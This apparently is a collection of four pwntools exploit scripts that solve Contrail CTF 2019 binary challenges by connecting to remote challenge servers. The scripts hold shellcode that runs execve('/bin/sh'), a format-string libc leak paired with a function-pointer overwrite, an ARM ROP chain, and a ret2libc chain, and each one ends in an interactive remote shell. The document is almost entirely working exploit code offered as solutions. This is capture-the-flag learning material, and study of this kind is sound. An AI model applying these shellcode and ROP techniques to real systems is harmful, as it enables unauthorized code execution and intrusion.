Contrail CTF 2019 (pokebattle, welcomechain, EasyShellcode, RaspiWorld)
# -*- coding: utf-8 -*- | |
from pwn import * | |
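context.update(arch='amd64', os='linux')
host = '114.177.250.4'
port = 2210

# EasyShellcode: the service accepts at most 0x14 (20) bytes of code.
# The stub below assembles to 13 bytes and is followed by "/bin/sh", so the
# buffer is filled exactly -- there is no room for the string's NUL
# terminator, which must come from the (assumed zero) byte after the buffer.
#
# Register assumptions at entry, inferred from the stub -- confirm in gdb:
#   [rax]  holds a pointer to this buffer  -> rdi = buf + 13 = "/bin/sh"
#   ebp == 0                               -> eax = 0x3b = SYS_execve
#   rsi/rdx are NULL (or point to NULL)    -> argv/envp for execve
# (no comments inside the asm string: pwntools runs it through cpp/gas and
# stray ';' or '#' would be parsed, not ignored)
SHELLCODE_MAX = 0x14
stub = asm("""
    mov rdi, [rax]
    lea eax, [ebp + 0x3b]
    add rdi, 13
    syscall
""")
shellcode = stub + b"/bin/sh"

print(disasm(shellcode))
print(len(shellcode))
# An explicit check rather than assert: assert is stripped under -O and
# would let an oversized payload be silently truncated by the target.
if len(shellcode) > SHELLCODE_MAX:
    raise SystemExit("shellcode is %d bytes, limit is %d" % (len(shellcode), SHELLCODE_MAX))

# Connect only once the payload is known to fit.
s = remote(host, port)
s.send(shellcode)
s.interactive()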
# -*- coding: utf-8 -*- | |
from pwn import * | |
# pokebattle: x86-64 target; p16()/p64() below pack according to this context.
context.arch = 'amd64'
context.os = 'linux'
host = '114.177.250.4'
port = 2225
# One connection shared by the helpers below, which look it up by name.
s = remote(host, port)
def pokeball(slot, name):
    """Drive menu option 2: store ``name`` in pokeball ``slot``.

    ``name`` is written with send(), not sendline(), so the caller controls
    every byte that follows the name -- the payloads rely on that to reach
    the data stored right after it.
    """
    for prompt, answer in (('> ', '2'), ('slot : ', str(slot))):
        s.recvuntil(prompt)
        s.sendline(answer)
    s.recvuntil('name : ')
    s.send(name)
def fight():
    """Drive menu option 1 (fight); this is where the stored name is used."""
    choice = '1'
    s.recvuntil('> ')
    s.sendline(choice)
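# --- stage 1: leak libc ----------------------------------------------------
# Layout inferred from the payload (confirm against the binary): the 40-byte
# name is followed by a function pointer that fight() calls with the name as
# its first argument.  Two extra bytes overwrite the low 16 bits of that
# pointer with printf@plt's in-page offset.  12 of those bits are fixed by
# the page offset, the top 4 are randomised by PIE, so the guess lands once
# in 16.  A miss kills the process (EOFError) or yields garbage (ValueError),
# so reconnect and retry a bounded number of times instead of failing once.
NAME_LEN = 40
PRINTF_PLT_LOW16 = 0x47b0
# "%75$p" prints the stack slot holding a return address into
# __libc_start_main (+231).  The offsets below look like Ubuntu 18.04
# libc-2.27 (__libc_start_main 0x21ab0, system 0x4f440) -- re-derive them
# for any other target.
LEAK_FMT = b"%75$p\n\x00"
LIBC_START_MAIN_RET = 231
LIBC_START_MAIN_OFF = 0x21ab0
LIBC_SYSTEM_OFF = 0x4f440
MAX_ATTEMPTS = 32

for attempt in range(1, MAX_ATTEMPTS + 1):
    try:
        pokeball(0, LEAK_FMT.ljust(NAME_LEN, b"A") + p16(PRINTF_PLT_LOW16))
        fight()
        leaked = s.recvline(timeout=5).strip()   # b'' on timeout -> ValueError below
        libc_start_main = int(leaked, 16) - LIBC_START_MAIN_RET
        break
    except (EOFError, ValueError):
        log.info("attempt %d/%d: partial overwrite missed, reconnecting", attempt, MAX_ATTEMPTS)
        s.close()
        s = remote(host, port)   # pokeball()/fight() resolve `s` at call time
else:
    log.error("no libc leak after %d attempts", MAX_ATTEMPTS)

libc_base = libc_start_main - LIBC_START_MAIN_OFF
libc_system = libc_base + LIBC_SYSTEM_OFF
print("libc_start_main: {}".format(hex(libc_start_main)))

# --- stage 2: system("/bin/sh") --------------------------------------------
# Same slot, now replacing the whole 8-byte pointer with system(); the name
# itself is the command string fight() passes as the first argument.
cmd = b"/bin/sh\x00"
pokeball(0, cmd.ljust(NAME_LEN, b"A") + p64(libc_system))
fight()
s.interactive()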
# -*- coding: utf-8 -*- | |
from pwn import * | |
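# RaspiWorld: 32-bit ARM.  context.binary picks arch/endianness up from the
# ELF, which is what p32() packs with below.
context.binary = './0.elf'
host = '114.177.250.4'
port = 7777
s = remote(host, port)

# Address of the vulnerable function.  Unused in this chain; kept as the
# obvious re-entry target should a second stage ever be needed.
vuln = 0x104cc

# Goal: execve("/bin/sh", NULL, NULL) through `svc #0` with
#   r0 -> "/bin/sh" (the string lives on the stack inside the chain),
#   r1 = r2 = 0, r7 = 11 (__NR_execve on ARM EABI).
# Gadget addresses are used as absolute values, i.e. the binary is assumed
# not to be PIE -- confirm with checksec.  The list is in stack order: each
# "popped by X" group is exactly what gadget X pops.
parts = [
    b"A" * 0x40,      # overflowed buffer
    b"A" * 4,         # saved fp (r11)
    p32(0x1acc0),     # saved lr -> pop {r4, r6, r7, pc}
    # popped by 0x1acc0
    b"A" * 4,         # r4
    p32(0x5c46c),     # r6 -> mov r0, r2 ; pop {r4, r5, r6, r7, r8, sb, sl, pc}
    b"A" * 4,         # r7
    p32(0x65d54),     # pc -> add r2, sp, #0x24 ; add r1, sp, #0x28 ; blx r6
    # 0x65d54 pops nothing: it points r2 at the "/bin" word 0x24 bytes down
    # (the r5 slot of the next pop), then blx r6 runs 0x5c46c, which copies
    # r2 into r0 and pops:
    b"A" * 4,         # r4
    b"A" * 4,         # r5
    b"A" * 4,         # r6
    p32(11),          # r7 = __NR_execve
    b"A" * 4,         # r8
    b"A" * 4,         # sb
    b"A" * 4,         # sl
    p32(0x10c18),     # pc -> pop {r4, r5, r6, pc}
    # popped by 0x10c18 -- the r5/r6 slots double as the "/bin/sh\0" r0 points at
    b"A" * 4,         # r4
    b"/bin",          # r5  (== sp+0x24 when 0x65d54 ran)
    b"/sh\x00",       # r6
    p32(0x6d108),     # pc -> pop {r1, pc}
    # popped by 0x6d108
    p32(0x00),        # r1 = NULL (argv); overrides the sp+0x28 value set earlier
    p32(0x10160),     # pc -> pop {r3, pc}
    # popped by 0x10160
    p32(0x6d078),     # r3 -> pop {r2, r3} ; bx lr
    p32(0x22e80),     # pc -> pop {lr} ; bx r3
    # popped by 0x22e80
    p32(0x1d8c8),     # lr -> svc #0 ; pop {r7} ; bx lr
    # popped by 0x6d078 (reached through bx r3)
    p32(0x00),        # r2 = NULL (envp)
    p32(0x00),        # r3
    # popped by 0x1d8c8 after the syscall (only matters if execve fails)
    p32(0x00),        # r7
]
rop_chain = b"".join(parts)

# sendline() appends '\n'; if the target reads with a line-oriented call,
# a 0x0a byte inside the chain would truncate it (none of these gadget
# addresses contain one).
s.recvuntil(b"Welcome to Raspi World\n")
s.sendline(rop_chain)
s.interactive()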
# -*- coding: utf-8 -*- | |
from pwn import * | |
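context.update(arch='amd64', os='linux')
host = '114.177.250.4'
port = 2226
s = remote(host, port)

# welcomechain: binary-side addresses are used as absolute values, so the
# target is assumed not to be PIE (confirm with checksec).
welcome_addr = 0x400740   # re-enter the vulnerable function for stage 2
puts_plt = 0x4005a0
printf_got = 0x601030
pop_rdi = 0x400853        # pop rdi ; ret
ret = 0x00400576          # ret ; stack-alignment pad before system()

# libc offsets; these look like Ubuntu 18.04 libc-2.27 (printf 0x64e80,
# system 0x4f440, "/bin/sh" 0x1b3e9a) -- re-derive for any other target.
LIBC_PRINTF_OFF = 0x64e80
LIBC_SYSTEM_OFF = 0x4f440
LIBC_BINSH_OFF = 0x1b3e9a
# Buffer plus saved rbp up to the return address (inferred from the padding
# the chain needs; confirm against the binary).
PAD = b"A" * 0x28

# --- stage 1: puts(printf@got) leaks printf's libc address, then return
# into welcome() so we get a second overflow.
rop_chain = b"".join([
    PAD,
    p64(pop_rdi),
    p64(printf_got),
    p64(puts_plt),
    p64(welcome_addr),
])
s.recvuntil(b": ")
s.sendline(rop_chain)
s.recvline()   # presumably the rest of the line the program prints after our input
# puts() writes the 6 significant bytes of the pointer followed by '\n'.
# recvn() blocks until exactly 6 bytes arrive; recv(6) may legally return
# fewer and would silently corrupt the leak.  The '\n' stays in the buffer
# and is skipped by the next recvuntil().
libc_printf = u64(s.recvn(6).ljust(8, b"\x00"))
libc_base = libc_printf - LIBC_PRINTF_OFF
# libc is mmap'ed, so its base is page-aligned; anything else means the
# leak was misparsed or the offsets belong to a different libc build.
if libc_base & 0xfff:
    log.error("libc base %#x is not page-aligned -- bad leak or wrong offsets", libc_base)
print("[+] got libc_base: {}".format(hex(libc_base)))

# --- stage 2: system("/bin/sh") -------------------------------------------
libc_system = libc_base + LIBC_SYSTEM_OFF
libc_binsh = libc_base + LIBC_BINSH_OFF
rop_chain = b"".join([
    PAD,
    p64(pop_rdi),
    p64(libc_binsh),
    p64(ret),          # keeps rsp 16-byte aligned at system() entry (movaps inside libc otherwise faults)
    p64(libc_system),
])
s.recvuntil(b": ")
s.sendline(rop_chain)
s.interactive()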